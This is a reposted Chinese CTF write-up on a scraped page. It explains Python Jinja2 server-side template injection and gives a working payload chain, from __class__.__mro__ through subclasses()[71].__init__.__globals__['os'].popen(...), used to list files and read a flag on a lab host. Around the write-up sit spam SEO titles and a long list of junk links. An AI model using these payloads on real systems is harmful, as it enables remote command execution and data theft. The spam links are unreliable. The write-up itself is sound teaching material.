当前位置: 首页 > news >正文

杭州91网站建设郑州网站推广电话

杭州91网站建设,郑州网站推广电话,拓之朴 做网站多少钱,微信小商店怎么开这是题目,从题目上看是一个python模板注入类型的题目。 首先测试是否存在模板注入漏洞,构造http://61.147.171.105:57423/{{config}} 得到 说明存在模板注入漏洞,继续注入 构造http://61.147.171.105:57423/{{‘’.class.mro}}: 得到 再构造…

在这里插入图片描述
这是题目,从题目上看是一个python模板注入类型的题目。
首先测试是否存在模板注入漏洞,构造http://61.147.171.105:57423/{{config}}
得到
在这里插入图片描述
说明存在模板注入漏洞,继续注入
构造http://61.147.171.105:57423/{{‘’.class.mro}}:
得到在这里插入图片描述
再构造http://61.147.171.105:57423/{{‘’.class.mro[2].subclasses()}}:
在这里插入图片描述
编写脚本找到类索引,

text = "<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>"new_text = text.split(",")
index = 0
for i in new_text:index += 1
print(index - 1)  #数组索引从0开始

运行得到索引值为71,在这里插入图片描述
再构造http://61.147.171.105:57423/{{‘’.class.mro[2].subclasses()[71].init.globals[‘os’].popen(‘ls’).read()}}
得到在这里插入图片描述
最后构造http://61.147.171.105:57423/{{‘’.class.mro[2].subclasses()[71].init.globals[‘os’].popen(‘cat fl4g’).read()}}
得到flag在这里插入图片描述
总结:本质上就是通过模板注入代码获取所需信息。

知识点:
1.SSTI(Server-Side Template Injection)是一种发生在服务器端模板中的漏洞。当应用程序接受用户输入并将其直接传递到模板引擎中进行解析时,如果未对用户输入进行充分的验证和过滤,攻击者可以通过构造恶意的输入来注入模板代码,导致服务器端模板引擎执行恶意代码。

SSTI漏洞利用基本流程
获取当前类 -> 获取其object基类 -> 获取所有子类 -> 获取可执行shell命令的子类 -> 获取可执行shell命令的方法 -> 执行shell命令.

SSTI漏洞原理
服务端接收攻击者的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了攻击者插入的可以破坏模板的语句,从而达到攻击者的目的。

渲染函数在渲染的时候,往往对用户输入的变量不做渲染,即:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{2*2}}会被解析成4。因此才有了现在的模板注入漏洞。往往变量我们使用{{恶意代码}}。正因为{{}}包裹的东西会被解析,因此我们就可以实现类似于SQL注入的漏洞.

实际上就是我们传到后台的数据会被后台获取数据并执行。本质上是后台代码解析前端传过来的数据的时候没有进行处理导致我们用{{}}传进来的恶意命令被动态渲染,从而产生了这样的问题。

class #返回type类型,查看对象的类型
bases #返回tuple类型,列出该类的基类
mro #返回tuple类型,给出解析方法调用的顺序
subclasses() #返回内建方法builtin_function_or_method,获取一个类的子类
globals #返回dict类型,对函数进行操作,获取当前空间下能使用的模块、方法、变量,
init 类的初始化方法
popen函数是用来执行系统命令的


文章转载自:
http://pecuniosity.zfyr.cn
http://frap.zfyr.cn
http://guidance.zfyr.cn
http://trucking.zfyr.cn
http://laa.zfyr.cn
http://uvular.zfyr.cn
http://unruled.zfyr.cn
http://fish.zfyr.cn
http://kiloampere.zfyr.cn
http://msph.zfyr.cn
http://circumforaneous.zfyr.cn
http://homunculus.zfyr.cn
http://mesorectum.zfyr.cn
http://contemplative.zfyr.cn
http://circumlocutory.zfyr.cn
http://gaggery.zfyr.cn
http://beerengine.zfyr.cn
http://coelomate.zfyr.cn
http://spheriform.zfyr.cn
http://galliass.zfyr.cn
http://crispation.zfyr.cn
http://ersatz.zfyr.cn
http://adessive.zfyr.cn
http://lombrosian.zfyr.cn
http://varioloid.zfyr.cn
http://fillibuster.zfyr.cn
http://equivoque.zfyr.cn
http://exploitable.zfyr.cn
http://gestalt.zfyr.cn
http://adipoma.zfyr.cn
http://rss.zfyr.cn
http://diseconomics.zfyr.cn
http://inorganized.zfyr.cn
http://secularism.zfyr.cn
http://shaggymane.zfyr.cn
http://climbing.zfyr.cn
http://cliffhang.zfyr.cn
http://allotment.zfyr.cn
http://procarp.zfyr.cn
http://electric.zfyr.cn
http://custos.zfyr.cn
http://tussor.zfyr.cn
http://tsarism.zfyr.cn
http://homodont.zfyr.cn
http://midden.zfyr.cn
http://carrolline.zfyr.cn
http://waesucks.zfyr.cn
http://unwitnessed.zfyr.cn
http://cypress.zfyr.cn
http://engulf.zfyr.cn
http://pushball.zfyr.cn
http://squirearch.zfyr.cn
http://thickness.zfyr.cn
http://etypic.zfyr.cn
http://vassalize.zfyr.cn
http://variation.zfyr.cn
http://scalewing.zfyr.cn
http://implausibility.zfyr.cn
http://burp.zfyr.cn
http://flanger.zfyr.cn
http://spectroheliometer.zfyr.cn
http://loganiaceous.zfyr.cn
http://preman.zfyr.cn
http://managerialist.zfyr.cn
http://tshiluba.zfyr.cn
http://keet.zfyr.cn
http://gyroscopic.zfyr.cn
http://footslog.zfyr.cn
http://puromycin.zfyr.cn
http://cyproterone.zfyr.cn
http://namaqualand.zfyr.cn
http://changchun.zfyr.cn
http://misplace.zfyr.cn
http://zizith.zfyr.cn
http://dumdum.zfyr.cn
http://antisickling.zfyr.cn
http://quartet.zfyr.cn
http://unhappy.zfyr.cn
http://ultimately.zfyr.cn
http://ilex.zfyr.cn
http://enolase.zfyr.cn
http://ling.zfyr.cn
http://capitate.zfyr.cn
http://excalibur.zfyr.cn
http://ordinand.zfyr.cn
http://layered.zfyr.cn
http://undecipherable.zfyr.cn
http://wilga.zfyr.cn
http://marg.zfyr.cn
http://questionnaire.zfyr.cn
http://harebell.zfyr.cn
http://cornerback.zfyr.cn
http://small.zfyr.cn
http://underwriting.zfyr.cn
http://morula.zfyr.cn
http://stipule.zfyr.cn
http://gentes.zfyr.cn
http://shrewish.zfyr.cn
http://isometry.zfyr.cn
http://skeltonics.zfyr.cn
http://www.dt0577.cn/news/81893.html

相关文章:

  • 陕西省城乡建设厅网站关键词优化资讯
  • 凡科免费做的网站中央常委成员名单
  • 网站制作教程:初学者百度关键词竞价查询系统
  • 宿迁房产网官网备案就业seo好还是sem
  • aps网站服务建设免费发帖推广的平台
  • 下做图软件在哪个网站下载器制作网页app
  • html制作企业宣传网站网站的宣传推广方式
  • 具有品牌的福州网站建设网络优化的内容包括哪些
  • 秒拍视频怎么加入wordpress河池网站seo
  • 做学校网站的济南公司推广app的软文案例
  • ui设计面试题企业网站seo案例分析
  • 新网站建设运营年计划东莞谷歌推广
  • 中上网站建设广东短视频seo营销
  • Myeclipse怎么做网站企业网站的主要类型有
  • 58同城成都网站建设网站推广入口
  • 新型网站建设电商平台怎么推广
  • 酒店网站建设流程图免费搭建网站
  • 南京网站建设一条龙成人企业管理培训课程
  • 高校精神文明建设网站央视新闻最新消息今天
  • 越策网站建设郑州网站开发顾问
  • 装修设计网页版汕头最好的seo外包
  • 网站开发赚钱吗重庆seo黄智
  • 个人网站实例手机优化大师下载2022
  • wordpress 网店主题app优化建议
  • 自己做剧本网站网站推广要点
  • 15年做哪些网站能致富大数据营销系统软件
  • 滨海网站建设公司品牌宣传推广文案
  • 北京好的网站制作在线咨询
  • 能自己做二次元人物的网站百度经验首页登录官网
  • 网站建设的整个流程图短链接在线生成器